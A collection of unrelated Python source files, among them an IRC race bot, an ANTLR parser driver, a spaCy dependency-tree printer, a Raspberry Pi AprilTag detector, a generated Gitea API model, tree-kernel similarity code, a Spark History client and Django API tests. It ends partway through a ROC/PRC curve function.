races = await get_all_races()
for race in races['races']:
if race['game']['abbrev'] in games:
race_id = race['id']
if not self.in_channel(f'#srl-{race_id}'):
if c.DEBUG:
logging.info(f'would have joined #srl-{race_id}')
else:
await self.join(f'#srl-{race_id}')
async def process_active_races(self):
logging.info('process active races running')
active_races = await srl_races.get_srl_races()
for active_race in active_races:
race = await get_race(active_race['srl_id'])
channel_name = f"#srl-{active_race['srl_id']}"
if not race:
await srl_races.delete_srl_race(active_race['srl_id'])
elif not race['state'] == 1:
if not self.in_channel(channel_name):
await self.join(channel_name)
await self.message(channel_name, f".setgoal {active_race['goal']}")
await srl_races.delete_srl_race(active_race['srl_id'])
async def message_logger(msgtype, target, source, message):
# redact passwords from logs
try:
message = message.replace(c.SRL_PASSWORD, '**********')
except AttributeError:
pass
# write event to channel log
msg = f'{datetime.datetime.now()} - {msgtype} - {target} - {source} - "{message}"\n'
if target == c.SRL_NICK:
fileloc = f'/var/log/sahasrahbot/srl/{source}.txt'
else:
fileloc = f'/var/log/sahasrahbot/srl/{target}.txt'
async with aiofiles.open(fileloc, mode='a+') as logfile:
await logfile.write(msg)
srlbot = SrlBot(c.SRL_NICK, realname=c.SRL_NICK)
|
import logging
import os
import sys
from antlr4 import *
from antlr4.error.ErrorListener import ErrorListener
from antlr4.tree.Trees import Trees
from FirstPassTwoDimParserListener import FirstPassTwoDimParserListener
from SecondPassTwoDimParserListener import SecondPassTwoDimParserListener
from TwoDimLexer import TwoDimLexer
from TwoDimParser import TwoDimParser
class SyntaxErrorListener(ErrorListener):
def __init__(self):
super(SyntaxErrorListener, self).__init__()
def syntaxError(self, recognizer, offending_symbol, line, column, msg, e):
if e.input.tokens[offending_symbol.tokenIndex - 1].text.upper() in ["RIGHT", "LEFT", "TOP", "BOT","IN"] \
or (
e.input.tokens[offending_symbol.tokenIndex - 1].text.upper() == " " and e.input.tokens[
offending_symbol.tokenIndex - 2].text.upper() in ["RIGHT", "LEFT", "TOP", "BOT", "IN"]):
raise SyntaxError(
f"Syntax error in relational operation at line {line} column {column}. Check the operation declaration.")
raise SyntaxError(f"Symbol \"{offending_symbol.text}\" at line {line} column {column} not recognized. \n"
f"Tip: If \"{offending_symbol.text}\" is what you meant here, check if preceding symbols"
f" are also correct and conforms with syntax. Also check if there is a semicolon in "
f"the preceding line.")
class LexerErrorListener(ErrorListener):
def __init__(self):
super(LexerErrorListener, self).__init__()
def syntaxError(self, recognizer, offending_token, line, column, msg, e):
endIndex = e.input.index
offset = len(str(e.input.strdata)) - e.input.index
for c in [' ', ';', '(', ')', '[', ']', '{', '}', '<', '>', ',']:
if str(e.input.strdata)[e.input.index:].find(c) >= 0 and str(e.input.strdata)[e.input.index:].find(
c) < offset:
offset = str(e.input.strdata)[e.input.index:].find(c)
endIndex += offset
offending_token = str(e.input.strdata)[e.startIndex:endIndex]
raise SyntaxError(
f"Syntax Error (Incorrect lexeme): failed to parse token \"{offending_token}\" at line {line} column {column}."
f"Check if it fits in syntax rules, is typed correctly and the register used is appropriate.")
def main(argv):
try:
input_stream = FileStream(argv[1])
lexer = TwoDimLexer(input_stream)
lexer.removeErrorListeners()
lexer.addErrorListener(LexerErrorListener())
stream = CommonTokenStream(lexer)
parser = TwoDimParser(stream)
parser.removeErrorListeners()
parser.addErrorListener(SyntaxErrorListener())
# Start rule
tree = parser.sourceFile()
logging.info(Trees.toStringTree(tree, ruleNames=parser.ruleNames))
print(Trees.toStringTree(tree, ruleNames=parser.ruleNames))
# Print what the parser sees
##############################################
############### First Pass #################
##############################################
# Create listener
printer = FirstPassTwoDimParserListener()
# Walk the generated tree with our listener attached
walker = ParseTreeWalker()
walker.walk(printer, tree)
global_context = printer.context
##############################################
############### Second Pass ################
##############################################
# Create listener
if len(argv) >= 3: # If output path was specified
printer = SecondPassTwoDimParserListener(global_context=global_context, parser=parser, output_path=argv[2])
else:
printer = SecondPassTwoDimParserListener(global_context=global_context, parser=parser,
output_path='./generated_images/output.svg')
# Walk the generated tree with our listener attached
walker = ParseTreeWalker()
walker.walk(printer, tree)
except IndexError as e:
logging.error(e)
if len(argv) < 2:
logging.error("Not all necessary arguments have been provided.")
except FileNotFoundError as e:
logging.error(e)
except Exception as e:
message = f"File {'' if len(argv) < 2 else os.path.abspath(argv[1])}\n{e}"
exception_type = e.__class__
logging.error(message)
if __name__ == '__main__':
main(sys.argv)
|
<reponame>blotspot/expanse-book-analysis<gh_stars>0
# -*- coding: utf-8 -*-
#
# Box-drawing characters are the thin variants, and can be found here:
# https://en.wikipedia.org/wiki/Box-drawing_character
#
""" explacy.py
This module uses unicode box-drawing characters to draw the spacy-derived
dependency tree of whichever (unicode) string you provide as input.
Usage:
import explacy
import spacy
nlp = spacy.load('en')
explacy.print_parse_info(nlp, 'The salad was surprisingly tasty.')
# Use a unicode string as input (eg u'The dog jumped.') in Python 2.
Example tree rendering:
Dep tree Token Dep type Lemma Part of Sp
──────── ──────────── ──────── ──────────── ──────────
┌─► The det the DET
┌─►└── salad nsubj salad NOUN
┌┼───── was ROOT be VERB
││ ┌─► surprisingly advmod surprisingly ADV
│└─►└── tasty acomp tasty ADJ
└─────► . punct . PUNCT
"""
import sys
from collections import defaultdict
from pprint import pprint
_do_print_debug_info = False
def _print_table(rows):
col_widths = [max(len(s) for s in col) for col in zip(*rows)]
fmt = ' '.join('%%-%ds' % width for width in col_widths)
rows.insert(1, ['─' * width for width in col_widths])
for row in rows:
# Uncomment this version to see code points printed out (for debugging).
# print(list(map(hex, map(ord, list(fmt % tuple(row))))))
print(fmt % tuple(row))
def _start_end(arrow):
start, end = arrow['from'].i, arrow['to'].i
mn = min(start, end)
mx = max(start, end)
return start, end, mn, mx
def print_parse_info(nlp, sent):
""" Print the dependency tree of `sent` (sentence), along with the lemmas
(de-inflected forms) and parts-of-speech of the words.
The input `sent` is expected to be a unicode string (of type unicode in
Python 2; of type str in Python 3). The input `nlp` (for natural
language parser) is expected to be the return value from a call to
spacy.load(), in other words, it's the callable instance of a spacy
language model.
"""
unicode_type = str
assert type(sent) is unicode_type
# Parse our sentence.
doc = nlp(sent)
# Build a list of arrow heights (distance from tokens) per token.
heights = [[] for token in doc]
# Build the arrows.
# Set the from and to tokens for each arrow.
arrows = [{'from': src, 'to': dst, 'underset': set()}
for src in doc
for dst in src.children]
# Set the base height; these may increase to allow room for arrowheads after this.
arrows_with_deps = defaultdict(set)
for i, arrow in enumerate(arrows):
if _do_print_debug_info:
print('Arrow %d: "%s" -> "%s"' % (i, arrow['from'], arrow['to']))
num_deps = 0
start, end, mn, mx = _start_end(arrow)
for j, other in enumerate(arrows):
if arrow is other:
continue
o_start, o_end, o_mn, o_mx = _start_end(other)
if ((start == o_start and mn <= o_end <= mx) or
(start != o_start and mn <= o_start <= mx)):
num_deps += 1
if _do_print_debug_info:
print('%d is over %d' % (i, j))
arrow['underset'].add(j)
arrow['num_deps_left'] = arrow['num_deps'] = num_deps
arrows_with_deps[num_deps].add(i)
if _do_print_debug_info:
print('')
print('arrows:')
pprint(arrows)
print('')
print('arrows_with_deps:')
pprint(arrows_with_deps)
# Render the arrows in characters. Some heights will be raised to make room for arrowheads.
lines = [[] for token in doc]
num_arrows_left = len(arrows)
while num_arrows_left > 0:
assert len(arrows_with_deps[0])
arrow_index = arrows_with_deps[0].pop()
arrow = arrows[arrow_index]
src, dst, mn, mx = _start_end(arrow)
# Check the height needed.
height = 3
if arrow['underset']:
height = max(arrows[i]['height'] for i in arrow['underset']) + 1
height = max(height, 3, len(lines[dst]) + 3)
arrow['height'] = height
if _do_print_debug_info:
print('')
print('Rendering arrow %d: "%s" -> "%s"' % (arrow_index,
arrow['from'],
arrow['to']))
print(' height = %d' % height)
goes_up = src > dst
# Draw the outgoing src line.
if lines[src] and len(lines[src]) < height:
lines[src][-1].add('w')
while len(lines[src]) < height - 1:
lines[src].append(set(['e', 'w']))
if len(lines[src]) < height:
lines[src].append({'e'})
lines[src][height - 1].add('n' if goes_up else 's')
# Draw the incoming dst line.
lines[dst].append(u'►')
while len(lines[dst]) < height:
lines[dst].append({'e', 'w'})
lines[dst][-1] = set(['e', 's']) if goes_up else set(['e', 'n'])
# Draw the adjoining vertical line.
for i in range(mn + 1, mx):
while len(lines[i]) < height - 1:
lines[i].append(' ')
lines[i].append(set(['n', 's']))
# Update arrows_with_deps.
for arr_i, arr in enumerate(arrows):
if arrow_index in arr['underset']:
arrows_with_deps[arr['num_deps_left']].remove(arr_i)
arr['num_deps_left'] -= 1
arrows_with_deps[arr['num_deps_left']].add(arr_i)
num_arrows_left -= 1
arr_chars = {'ew' : u'─',
'ns' : u'│',
'en' : u'└',
'es' : u'┌',
'ens' : u'├',
'enw' : u'┴',
'ensw': u'┼',
'esw' : u'┬'}
# Convert the character lists into strings.
max_len = max(len(line) for line in lines)
for i in range(len(lines)):
lines[i] = [arr_chars[''.join(sorted(ch))] if type(ch) is set else ch
for ch in lines[i]]
lines[i] = ''.join(reversed(lines[i]))
lines[i] = ' ' * (max_len - len(lines[i])) + lines[i]
# Compile full table to print out.
rows = [['Dep tree', 'Token', 'Dep type', 'Lemma', 'Part of Sp']]
for i, token in enumerate(doc):
rows.append([lines[i], token, token.dep_, token.lemma_, token.pos_])
_print_table(rows)
|
import time
import picamera
import apriltag
import cv2
import numpy as np
import math
import threading
from parameters import Parameters
# Create a pool of image processors
done = False
lock = threading.Lock()
pool = []
np.set_printoptions(suppress=True)
##########################################################################
class ImageProcessor(threading.Thread):
def __init__(self, width, height, parameters):
super(ImageProcessor, self).__init__()
self.height = height
self.width = width
self.detector = apriltag.Detector()
self.tag_size = 3.0
self.parameters = (0,0,0,0) #x,y,z,r
self.paramstruct = parameters;
# self.paramstruct = Parameters();
fov_x = 62.2*math.pi/180
fov_y = 48.8*math.pi/180
fx = self.width/(2*math.tan(fov_x/2))
fy = self.height/(2*math.tan(fov_y/2))
self.camera_params = (fx, fy, width/2, height/2)
self.img = np.empty((self.width * self.height * 3,),dtype=np.uint8)
self.event = threading.Event()
self.terminated = False
self.start()
def run(self):
# This method runs in a separate thread
global done
while not self.terminated:
# Wait for an image to be written to the stream
if self.event.wait(1):
try:
t = time.time()
self.img = self.img.reshape((self.height,self.width,3))
self.img = cv2.cvtColor(self.img,cv2.COLOR_BGR2GRAY)
results = self.detector.detect(self.img)
for i, detection in enumerate(results):
pose, e0, e1 = self.detector.detection_pose(detection,self.camera_params,self.tag_size)
mat = np.array(pose)
T = mat[0:3,3]
# print("MAT:", mat)
rz = -math.atan2(mat[1,0],mat[0,0])
lock.acquire()
self.paramstruct.add(np.array(mat[0:3,3]), rz, t)
lock.release()
if results == []:
lock.acquire()
self.paramstruct.softReset()
lock.release()
finally:
# Reset the stream and event
self.img = np.empty((self.width * self.height * 3,),dtype=np.uint8)
self.event.clear()
# Return ourselves to the pool
with lock:
pool.append(self)
class PiCam(object):
def __init__(self, multi, parameters):
self.width = 160 #640
self.height = 128 #480
self.params = parameters
self.multi = multi
global pool
if (multi):
pool = [ImageProcessor(self.width,self.height,self.params) for i in range(8)]
else:
pool = [ImageProcessor(self.width,self.height,self.params) for i in range(1)]
def streams(self):
global done
global lock
while not done:
with lock:
if pool:
processor = pool.pop()
else:
processor = None
if processor:
yield processor.img
processor.event.set()
else:
# When the pool is starved, wait a while for it to refill
time.sleep(0.1)
def start(self):
with picamera.PiCamera() as camera:
width = self.width
height = self.height
camera.sensor_mode = 4
camera.framerate=30
camera.exposure_mode = 'sports'
camera.resolution = (self.width, self.height)
time.sleep(2)
camera.capture_sequence(self.streams(), 'bgr', use_video_port=True)
# Shut down the processors in an orderly fashion
while pool:
with lock:
processor = pool.pop()
processor.terminated = True
processor.join()
#######################
if __name__ == "__main__":
paramstruct = Parameters()
cam = PiCam(True, paramstruct)
cam.start()
|
<filename>gitea_client/models/tracked_time.py
# coding: utf-8
"""
Gitea API.
This documentation describes the Gitea API. # noqa: E501
OpenAPI spec version: 1.1.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class TrackedTime(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'created': 'datetime',
'id': 'int',
'issue': 'Issue',
'issue_id': 'int',
'time': 'int',
'user_id': 'int',
'user_name': 'str'
}
attribute_map = {
'created': 'created',
'id': 'id',
'issue': 'issue',
'issue_id': 'issue_id',
'time': 'time',
'user_id': 'user_id',
'user_name': 'user_name'
}
def __init__(self, created=None, id=None, issue=None, issue_id=None, time=None, user_id=None, user_name=None): # noqa: E501
"""TrackedTime - a model defined in Swagger""" # noqa: E501
self._created = None
self._id = None
self._issue = None
self._issue_id = None
self._time = None
self._user_id = None
self._user_name = None
self.discriminator = None
if created is not None:
self.created = created
if id is not None:
self.id = id
if issue is not None:
self.issue = issue
if issue_id is not None:
self.issue_id = issue_id
if time is not None:
self.time = time
if user_id is not None:
self.user_id = user_id
if user_name is not None:
self.user_name = user_name
@property
def created(self):
"""Gets the created of this TrackedTime. # noqa: E501
:return: The created of this TrackedTime. # noqa: E501
:rtype: datetime
"""
return self._created
@created.setter
def created(self, created):
"""Sets the created of this TrackedTime.
:param created: The created of this TrackedTime. # noqa: E501
:type: datetime
"""
self._created = created
@property
def id(self):
"""Gets the id of this TrackedTime. # noqa: E501
:return: The id of this TrackedTime. # noqa: E501
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this TrackedTime.
:param id: The id of this TrackedTime. # noqa: E501
:type: int
"""
self._id = id
@property
def issue(self):
"""Gets the issue of this TrackedTime. # noqa: E501
:return: The issue of this TrackedTime. # noqa: E501
:rtype: Issue
"""
return self._issue
@issue.setter
def issue(self, issue):
"""Sets the issue of this TrackedTime.
:param issue: The issue of this TrackedTime. # noqa: E501
:type: Issue
"""
self._issue = issue
@property
def issue_id(self):
"""Gets the issue_id of this TrackedTime. # noqa: E501
deprecated (only for backwards compatibility) # noqa: E501
:return: The issue_id of this TrackedTime. # noqa: E501
:rtype: int
"""
return self._issue_id
@issue_id.setter
def issue_id(self, issue_id):
"""Sets the issue_id of this TrackedTime.
deprecated (only for backwards compatibility) # noqa: E501
:param issue_id: The issue_id of this TrackedTime. # noqa: E501
:type: int
"""
self._issue_id = issue_id
@property
def time(self):
"""Gets the time of this TrackedTime. # noqa: E501
Time in seconds # noqa: E501
:return: The time of this TrackedTime. # noqa: E501
:rtype: int
"""
return self._time
@time.setter
def time(self, time):
"""Sets the time of this TrackedTime.
Time in seconds # noqa: E501
:param time: The time of this TrackedTime. # noqa: E501
:type: int
"""
self._time = time
@property
def user_id(self):
"""Gets the user_id of this TrackedTime. # noqa: E501
deprecated (only for backwards compatibility) # noqa: E501
:return: The user_id of this TrackedTime. # noqa: E501
:rtype: int
"""
return self._user_id
@user_id.setter
def user_id(self, user_id):
"""Sets the user_id of this TrackedTime.
deprecated (only for backwards compatibility) # noqa: E501
:param user_id: The user_id of this TrackedTime. # noqa: E501
:type: int
"""
self._user_id = user_id
@property
def user_name(self):
"""Gets the user_name of this TrackedTime. # noqa: E501
:return: The user_name of this TrackedTime. # noqa: E501
:rtype: str
"""
return self._user_name
@user_name.setter
def user_name(self, user_name):
"""Sets the user_name of this TrackedTime.
:param user_name: The user_name of this TrackedTime. # noqa: E501
:type: str
"""
self._user_name = user_name
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(TrackedTime, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, TrackedTime):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
"""
Author: <NAME> (@leriomaggio)
Mail: <EMAIL>
"""
from itertools import ifilter, product
from functools import wraps
from math import sqrt
from numpy import sum as np_sum
# --------------------------------------------------------------------------
# Node Similarities (Kernels on Nodes)
# --------------------------------------------------------------------------
def match(n1, n2):
""" Matching Function: determines wether two nodes are comparable. """
return n1.instruction_class == n2.instruction_class
def features_similarity(n1, n2):
"""
Feature Similarity: Computes a similarity value according to nodes attributes.
"""
if n1.is_leaf_node and n2.is_leaf_node:
return int(n1.instruction == n2.instruction and n1.label == n2.label)
return int(n1.instruction == n2.instruction)
def structural_similarity(n1, n2):
"""
Structural Similarity function (used to detect (without errors) up to Type 2 clones)
"""
if n1.instruction == n2.instruction:
return 1.0
return 0.0
#------------------------------------------------------------------------------
# 01. Iterative Contiguous Kernel (Partial Trees)
#------------------------------------------------------------------------------
# Supporting functions
def compute_pairs_similarities(node_pairs_list, similarity=features_similarity):
"""
Reminder: Improve using numpy.sum
"""
return np_sum([similarity(n1, n2) for n1, n2 in node_pairs_list])
def extract_contiguous_kernel_nodes(t1, t2):
"""
Extract all the possibile pairs of nodes that match
--- (Improved version using itertools - TO BE TESTED.) ---
Note that ifilter returns a Generator, rather than a list (this should me more
efficient in terms of memory consumption).
Nevertheless, the list could be trivially returned instead by removing
the "i" from `ifilter` :-)
(This will call the built-in Python `filter` function)
"""
# return [(n1, n2) for n1 in t1.children for n2 in t2.children if match(n1, n2)]
return ifilter(lambda p: match(p[0], p[1]), product(t1.children, t2.children))
# Memoization in Python with wraps - useful for normalization to avoid repeating calculations
# The memoization is exploited only in case of t1 == t2, i.e., we are computing
# normalization values.
# This is to avoid repeating useless calculations, while not wasting memory storing the
# computation of each pair.
def memo(func):
cache = {}
@wraps(func)
def wrap(t1, t2, node_sim_func):
if t1 == t2:
if t1 not in cache:
cache[t1] = func(t1, t2, node_sim_func)
return cache[t1]
return func(t1, t2, node_sim_func)
return wrap
def iterative_kernel_function(node_pairs_list, node_similarity=features_similarity):
"""
Iterative Tree Kernel Function
"""
if not node_pairs_list or not len(node_pairs_list):
return 0.0
k = 0.0
while len(node_pairs_list):
pair = node_pairs_list.pop(0)
k += compute_pairs_similarities([pair], similarity=node_similarity)
matching_subtrees = extract_contiguous_kernel_nodes(pair[0], pair[1])
node_pairs_list.extend(matching_subtrees)
return k
@memo
def iterative_tree_kernel(tree1, tree2, node_similarity=features_similarity):
'''
Iterative Tree Kernel
'''
if not match(tree1, tree2):
return 0.0
return iterative_kernel_function([(tree1, tree2)], node_similarity)
# --------------------------------------------------------------------------
# Normalized Tree Kernel function
# --------------------------------------------------------------------------
def contiguous_tree_kernel(t1, t2, node_similarity=features_similarity):
"""
Compute the Normalized version of the Contiguous Tree Kernel function
(Value that range from 0 to 1)
"""
kernel_sim = iterative_tree_kernel(t1, t2, node_similarity)
#Normalization
return float(kernel_sim) / sqrt(iterative_tree_kernel(t1, t1, node_similarity) *
iterative_tree_kernel(t2, t2, node_similarity)) |
# Copyright 2011 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from analysis.storegraph import storegraph, canonicalobjects
from util.python.calling import CallerArgs
class ImageBuilder(object):
def __init__(self, compiler, prgm):
self.compiler = compiler
self.prgm = prgm
self.allObjects = set()
self.dirtyObjects = set()
self.canonical = canonicalobjects.CanonicalObjects()
self.storeGraph = storegraph.StoreGraph(self.compiler.extractor, self.canonical)
self.entryPoints = []
def objType(self, obj):
self.ensureLoaded(obj)
if obj.isAbstract():
return self.canonical.externalType(obj)
else:
return self.canonical.existingType(obj)
def objGraphObj(self, obj):
xtype = self.objType(obj)
region = self.storeGraph.regionHint
obj = region.object(xtype)
self.logObj(obj)
return obj
def logObj(self, obj):
if obj not in self.allObjects:
self.allObjects.add(obj)
self.dirtyObjects.add(obj)
def ensureLoaded(self, obj):
# HACK sometimes constant folding neglects this.
if not hasattr(obj, 'type'):
self.compiler.extractor.ensureLoaded(obj)
t = obj.type
if not hasattr(t, 'typeinfo'):
self.compiler.extractor.ensureLoaded(t)
def addAttr(self, src, attrName, dst):
obj = self.objGraphObj(src)
fieldName = self.canonical.fieldName(*attrName)
field = obj.field(fieldName, self.storeGraph.regionHint)
field.initializeType(self.objType(dst))
def getExistingSlot(self, pyobj):
obj = self.compiler.extractor.getObject(pyobj)
return self.objGraphObj(obj).xtype
def getInstanceSlot(self, typeobj):
obj = self.compiler.extractor.getInstance(typeobj)
return self.objGraphObj(obj).xtype
def handleArg(self, arg):
# Assumes args are not polymorphic! (True for now)
result = arg.get(self)
if result is None:
return None
else:
return [result]
def resolveEntryPoint(self, entryPoint):
selfarg = self.handleArg(entryPoint.selfarg)
args = [self.handleArg(arg) for arg in entryPoint.args]
kwds = []
varg = self.handleArg(entryPoint.varg)
karg = self.handleArg(entryPoint.karg)
return CallerArgs(selfarg, args, kwds, varg, karg, None)
def attachAttr(self, root):
pt = root.xtype.obj.pythonType()
for t in pt.mro():
fieldtypes = getattr(t, '__fieldtypes__', None)
if not isinstance(fieldtypes, dict): continue
for name, types in fieldtypes.iteritems():
descriptorName = self.compiler.slots.uniqueSlotName(getattr(pt, name))
nameObj = self.compiler.extractor.getObject(descriptorName)
fieldName = self.canonical.fieldName('Attribute', nameObj)
field = root.field(fieldName, self.storeGraph.regionHint)
if isinstance(types, type):
types = (types,)
for ft in types:
inst = self.compiler.extractor.getInstance(ft)
field.initializeType(self.objType(inst))
for obj in field:
self.logObj(obj)
def process(self):
interface = self.prgm.interface
for entryPoint in interface.entryPoint:
args = self.resolveEntryPoint(entryPoint)
self.entryPoints.append((entryPoint, args))
while self.dirtyObjects:
obj = self.dirtyObjects.pop()
self.attachAttr(obj)
def build(compiler, prgm):
ib = ImageBuilder(compiler, prgm)
ib.process()
prgm.storeGraph = ib.storeGraph
prgm.entryPoints = ib.entryPoints
|
<filename>spot/crawler/history_api.py
# Copyright 2020 ABSA Group Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import requests
import spot.utils.setup_logger
logger = logging.getLogger(__name__)
class SparkHistory:
def __init__(self, spark_history_base_url, ssl_path=None):
self._spark_history_base_url = spark_history_base_url
self.verify = ssl_path
self._session = None
def _init_session(self):
logger.debug('starting new Spark History session')
self._session = requests.Session()
if self.verify:
logger.debug(f"Using cert: {self.verify}")
self._session.verify = self.verify
retries = requests.packages.urllib3.util.retry.Retry(total=10, backoff_factor=1, status_forcelist=[502, 503, 504])
adapter = requests.adapters.HTTPAdapter(max_retries=retries)
self._session.mount(self._spark_history_base_url, adapter)
@staticmethod
def _merge_attempt_id(app_id, attempt):
if attempt is None:
return app_id
else:
return f"{app_id}/{attempt}"
def _get_data(self, path, params={}):
if self._session is None:
self._init_session()
url = f"{self._spark_history_base_url}/{path}"
logger.debug(f"sending request to {url} with params {params}")
headers = {'Accept': 'application/json'}
response = self._session.get(url, params=params, headers=headers)
if response.status_code != requests.codes.ok:
response.raise_for_status()
return response.json()
def get_app_attempts(self,
status=None,
min_date=None,
max_date=None,
min_end_date=None,
max_end_date=None,
apps_limit=None,
):
logger.info(f"Fetching apps from: {self._spark_history_base_url}")
app_path = 'applications'
params = {
'status': status,
'minDate': min_date,
'maxDate': max_date,
'minEndDate': min_end_date,
'maxEndDate': max_end_date,
'limit': apps_limit
}
data = self._get_data(app_path, params)
return data
def get_environment(self, app_id, attempt):
attempt_id = self._merge_attempt_id(app_id, attempt)
logger.debug(f"getting environment for {attempt_id}")
path = f"applications/{attempt_id}/environment"
data = self._get_data(path)
return data
def get_allexecutors(self, app_id, attempt):
attempt_id = self._merge_attempt_id(app_id, attempt)
logger.debug(f'getting all executors for {attempt_id}')
path = f"applications/{attempt_id}/allexecutors"
data = self._get_data(path)
return data
def get_stages(self, app_id, attempt, status=None):
attempt_id = self._merge_attempt_id(app_id, attempt)
logger.debug(f"getting stages for {attempt_id}")
path = f"applications/{attempt_id}/stages"
params = {'status': status}
data = self._get_data(path, params)
return data
|
<reponame>Francoralite/francoralite
# -*- coding: utf-8 -*-
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Authors: <NAME> / Coopérative ARTEFACTS <<EMAIL>>
"""
DocumentCollection tests
"""
import factory
import pytest
import sys
from django.core.management import call_command
from django.urls import reverse
from parameterized import parameterized
from rest_framework import status
from rest_framework.test import APITestCase
from .factories.document_collection import DocumentCollectionFactory
from ..models.document_collection import DocumentCollection
from ..models.document import Document
from ..models.collection import Collection
from .keycloak import get_token
# Expected structure for Document_collection objects
DOCUMENTCOLLECTION_STRUCTURE = [
('id', int),
('id_nakala', str),
('title', str),
('description', str),
('credits', str),
('date', str),
('collection', dict),
]
# Expected keys for MODEL objects
DOCUMENTCOLLECTION_FIELDS = sorted(
[item[0] for item in DOCUMENTCOLLECTION_STRUCTURE])
@pytest.mark.django_db
class TestDocumentCollectionList(APITestCase):
"""
This class manage all DocumentCollection tests
"""
def setUp(self):
"""
Run needed commands to have a fully working project
"""
self.url = "/api/collection/1/document"
self.url_detail = self.url + "/1"
get_token(self)
# Create a set of sample data
DocumentCollectionFactory.create_batch(1)
def test_can_get_document_collection_list(self):
"""
Ensure DocumentCollection objects exists
"""
# ORM side
document_collections = DocumentCollection.objects.all()
self.assertEqual(len(document_collections), 1)
# API side
response = self.client.get(self.url)
self.assertIsInstance(response.data, list)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), 1)
@parameterized.expand(DOCUMENTCOLLECTION_STRUCTURE)
def test_has_valid_document_collection_values(self, attribute, attribute_type):
"""
Ensure DocumentCollection objects have valid values
"""
response = self.client.get(self.url)
self.assertIsInstance(response.data, list)
self.assertEqual(response.status_code, status.HTTP_200_OK)
for document_collection in response.data:
# Check only expected attributes returned
self.assertEqual(
sorted(document_collection.keys()), DOCUMENTCOLLECTION_FIELDS)
# Ensure type of each attribute
if attribute_type == str:
self.assertIsInstance(document_collection[attribute], str)
else:
self.assertIsInstance(document_collection[attribute], attribute_type)
self.assertIsNot(document_collection[attribute], '')
def test_get_an_document_collection(self):
"""
Ensure we can get an DocumentCollection objects
using an existing id
"""
response = self.client.get(self.url_detail)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertIsInstance(response.data, dict)
def test_create_an_document_collection(self):
"""
Ensure we can create an DocumentCollection object
"""
data = factory.build(
dict,
FACTORY_CLASS=DocumentCollectionFactory)
# Convert the related entity in dictionnaryself.
# Then they will be easily converted in JSON format.
data['document'] = Document.objects.first().id
data['collection'] = Collection.objects.first().id
response = self.client.post(self.url, data, format='json')
# Check only expected attributes returned
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertIsInstance(response.data, dict)
self.assertEqual(
sorted(response.data.keys()),
DOCUMENTCOLLECTION_FIELDS)
self.assertEqual(response.data["id"], 2)
response_get = self.client.get(self.url + "/2")
self.assertEqual(response_get.status_code, status.HTTP_200_OK)
self.assertIsInstance(response_get.data, dict)
def test_delete_an_document_collection(self):
"""
Ensure we can delete an DocumentCollection object
"""
# Delete this object
response = self.client.delete(self.url_detail)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
# Ensure DocumentCollection removed
response_get = self.client.get(self.url_detail)
self.assertEqual(response_get.status_code, status.HTTP_404_NOT_FOUND)
|
<gh_stars>0
import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import precision_recall_curve, roc_curve, auc
######################
# ROC and PRC curves #
######################
def calc_metric_curve(preds, target, curve_type, squareform=False):
"""
Calculate ROC or PRC curves and area for the predicted contact channels.
Args:
- preds (np.ndarray) - Numpy array of model predictions either of form
(n_res, n_res, n_chan) or (n_res * [n_res - 1] / 2, n_chan).
- target (np.ndarray) - Numpy array of target values either of form
(n_res, n_res, n_chan) or (n_res * [n_res - 1] / 2, n_chan),
must match form of preds.
- curve_type (str) - One of 'ROC' or 'PRC' to denote type of curve.
- squareform (bool) - True if tensors are of shape (n_res, n_res, n_chan),
False if they are of shape (n_res * [n_res - 1] / 2, n_chan)
(default = True).
Returns:
- Tuple of x, y, and AUC values to be used for plotting the curves
using plot_curve metric.
"""
# Get correct curve function
if curve_type.upper() == 'ROC':
curve_func = roc_curve
elif curve_type.upper() == 'PRC':
curve_func = precision_recall_curve
# Generate dicts to hold outputs from curve generation functions
x = dict()
y = dict()
auc_ = dict()
# Handle case of squareform matrix (only get non-redundant triu indices)
if squareform:
indices = np.triu_indices(target.shape[0])
# For each channel
for i in range(target.shape[-1]):
# Handle case of squareform
if squareform:
var1, var2, _ = curve_func(target[:, :, i][indices],
preds[:, :, i][indices])
# Handle case of pairwise
else:
var1, var2, _ = curve_func(target[:, i], preds[:, i])
# Assign outputs to correct dict for plotting
if curve_type.upper() == 'ROC':
x[i] = var1
y[i] = var2
